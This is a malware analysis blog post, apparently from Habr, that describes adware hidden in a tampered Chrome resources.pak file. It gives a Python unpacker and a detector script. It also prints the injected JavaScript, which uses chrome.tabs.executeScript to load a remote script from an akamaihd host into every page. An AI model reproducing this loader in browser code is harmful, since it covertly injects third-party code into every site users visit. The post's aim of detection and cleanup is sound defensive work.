
New adware is embedded directly in the browser.

There is a new type of adware, which is embedded in the browser itself.


Another computer with a complaint about advertising in the browser. As usual, according to the user, nothing was launched, but the fact remains: ads appear on almost every site in every ad slot, and search queries are replaced. Usually most such problems are solved in five minutes with AntiSMS, after which the program's log is checked and, if necessary, leftovers such as third-party browser extensions are cleaned up, but not in this case. None of the usual means helped right away, even antiviruses saw no problems in the system, so it became interesting: where were the ads coming from?

To save time before doing anything by hand, the system was quickly checked with AVZ, Dr.Web CureIt! and Kaspersky Virus Removal Tool; all of them reported the system clean while the ads kept showing in the background. Tellingly, every other browser had been removed from the system and only Google Chrome remained, and since new infection methods are rare, suspicion fell on it last.

First, an advertising module from the company Express Find was found, carrying a valid digital signature dated April 8, quite fresh. It used three autorun locations at once, but after it was removed the ads miraculously kept appearing. Further investigation showed that they persisted even when a new profile was created. Adware used to settle in the profile, but here the developers got creative so that the ads would follow the user into any profile and under any account.

Next, the folder where Google Chrome was installed was examined. Everything looked fine: all files were digitally signed, nothing unusual. As a check, the folder was renamed and a fresh Chrome of the same version was installed right away. It then turned out that the resources.pak file differed from the original, and that was where the problem lay. The resources file was swapped for verification and this confirmed it: the culprit was found. A quick search for a way to unpack the resources turned up the following Python script:

import struct
import sys

PACK_FILE_VERSION = 4
HEADER_LENGTH = 2 * 4 + 1  # Two uint32s (file version, number of entries) and one uint8 (encoding of text resources)
INDEX_ENTRY_SIZE = 2 + 4   # Each index entry is a uint16 resource id and a uint32 offset.


class WrongFileVersion(Exception):
    pass


def ReadFile(filename):
    with open(filename, 'rb') as f:
        return f.read()


def UnpackDataPack(input_file):
    """Reads a data pack file, writes every resource to <id>.<type> and returns {id: bytes}."""
    original_data = ReadFile(input_file)
    # Read the header.
    version, num_entries, encoding = struct.unpack("<IIB", original_data[:HEADER_LENGTH])
    if version != PACK_FILE_VERSION:
        print("Wrong file version in", input_file)
        raise WrongFileVersion(input_file)
    resources = {}
    if num_entries == 0:
        return resources
    # Read the index and data. The index holds num_entries + 1 entries; the offset
    # of the extra sentinel entry marks the end of the last resource.
    data = original_data[HEADER_LENGTH:]
    for _ in range(num_entries):
        res_id, offset = struct.unpack("<HI", data[:INDEX_ENTRY_SIZE])
        data = data[INDEX_ENTRY_SIZE:]
        next_id, next_offset = struct.unpack("<HI", data[:INDEX_ENTRY_SIZE])
        resources[res_id] = original_data[offset:next_offset]
        # Guess a file type from the first byte so the dumped files are easy to browse.
        filetype = 'bin'
        fileheader = original_data[offset:offset + 1]
        if fileheader == b'<':
            filetype = 'html'
        elif fileheader == b'\x89':
            filetype = 'png'
        elif fileheader == b'/':
            filetype = 'js'
        with open('{0}.{1}'.format(res_id, filetype), 'wb') as of:
            of.write(original_data[offset:next_offset])
    return resources


def main():
    if len(sys.argv) > 1:
        UnpackDataPack(sys.argv[1])


if __name__ == '__main__':
    main()


The script unpacked both versions of the resources without trouble, and a comparison showed that the following block had been added to the beginning of one of the scripts; this is the adware:

chrome.tabs.onUpdated.addListener(function(tabId, changeInfo, tab) {
    chrome.tabs.executeScript(tabId, {code:
        "if(!window.blgcran){ window.blgcran = true;" +
        " var scr=document.createElement('script');" +
        " scr.src='https://expressfind-a.akamaihd.net/ExpressFind/cr?t=BLGC&g=ca4874d9-0a3e-4215-9772-67fb5ba1c08a';" +
        " document.head.appendChild(scr);}"
    });
});


Thus, on every site the user visits, a script is loaded over HTTPS from a host with a valid certificate, shows the ads and successfully bypasses antiviruses. This new implantation method lets the adware keep working even after it has been completely removed from the system by the usual means.
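The check that found the culprit above (diffing a suspect resources.pak against a clean copy of the same Chrome version) can be automated. The following Python 3 example is added here and is not the author's script: it parses the version-4 .pak layout used by the unpacker above, lists the resource ids whose bytes differ, and flags JS resources that carry the remote-script loader pattern shown in the injected block. The pak images are constructed inline with build_pak (a test helper, not a real pak writer) and the loader URL is a placeholder.

```python
import struct

PACK_FILE_VERSION = 4
HEADER_FMT, INDEX_FMT = "<IIB", "<HI"            # header: version, num_entries, text encoding; index: id, offset
HEADER_LEN, INDEX_LEN = struct.calcsize(HEADER_FMT), struct.calcsize(INDEX_FMT)


def parse_pak(data):
    """Return {resource_id: bytes} for a version-4 .pak image laid out as in the unpacker above."""
    version, num_entries, _encoding = struct.unpack(HEADER_FMT, data[:HEADER_LEN])
    if version != PACK_FILE_VERSION:
        raise ValueError("unsupported pak version %d" % version)
    index = []                                   # num_entries + 1 entries: the last one is a sentinel
    for i in range(num_entries + 1):             # whose offset marks the end of the final resource
        start = HEADER_LEN + i * INDEX_LEN
        index.append(struct.unpack(INDEX_FMT, data[start:start + INDEX_LEN]))
    return {rid: data[off:index[i + 1][1]] for i, (rid, off) in enumerate(index[:-1])}


def build_pak(resources):
    """Constructed helper (not a real pak writer): serialise {id: bytes} in the same layout."""
    items = sorted(resources.items())
    header = struct.pack(HEADER_FMT, PACK_FILE_VERSION, len(items), 1)
    index, body, off = b"", b"", HEADER_LEN + (len(items) + 1) * INDEX_LEN
    for rid, blob in items:
        index += struct.pack(INDEX_FMT, rid, off)
        body, off = body + blob, off + len(blob)
    return header + index + struct.pack(INDEX_FMT, 0, off) + body   # sentinel entry, then data


def diff_paks(clean, suspect):
    """Ids whose bytes differ between two parsed paks (changed, added or removed resources)."""
    return sorted(rid for rid in set(clean) | set(suspect) if clean.get(rid) != suspect.get(rid))


def injection_markers(blob):
    """Markers of the loader seen in the post: executeScript injecting a remote <script> element."""
    text = blob.decode("utf-8", "replace")
    wanted = ("chrome.tabs.executeScript", "document.createElement('script')", ".src='https://")
    return [m for m in wanted if m in text]


def check(clean_bytes, suspect_bytes):
    """Map every differing resource id to the loader markers found in the suspect copy."""
    clean, suspect = parse_pak(clean_bytes), parse_pak(suspect_bytes)
    return {rid: injection_markers(suspect.get(rid, b"")) for rid in diff_paks(clean, suspect)}


# Constructed sample: a "clean" pak and a copy whose JS resource 200 has the loader prepended.
CLEAN_JS = b"/* built-in script */ function init(){}"
INJECTED = (b"chrome.tabs.onUpdated.addListener(function(t){chrome.tabs.executeScript(t,{code:\""
            b"var scr=document.createElement('script');scr.src='https://PLACEHOLDER.example/cr';\"})});")
CLEAN = {100: b"<html></html>", 200: CLEAN_JS, 300: b"\x89PNG"}
SUSPECT = {**CLEAN, 200: INJECTED + CLEAN_JS}
```

Run check(build_pak(CLEAN), build_pak(SUSPECT)) to see the single modified id 200 reported with all three loader markers; against a real installation, feed it the bytes of the suspect resources.pak and of the one from a fresh install of the same version.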

Source: https://habr.com/ru/post/255333/
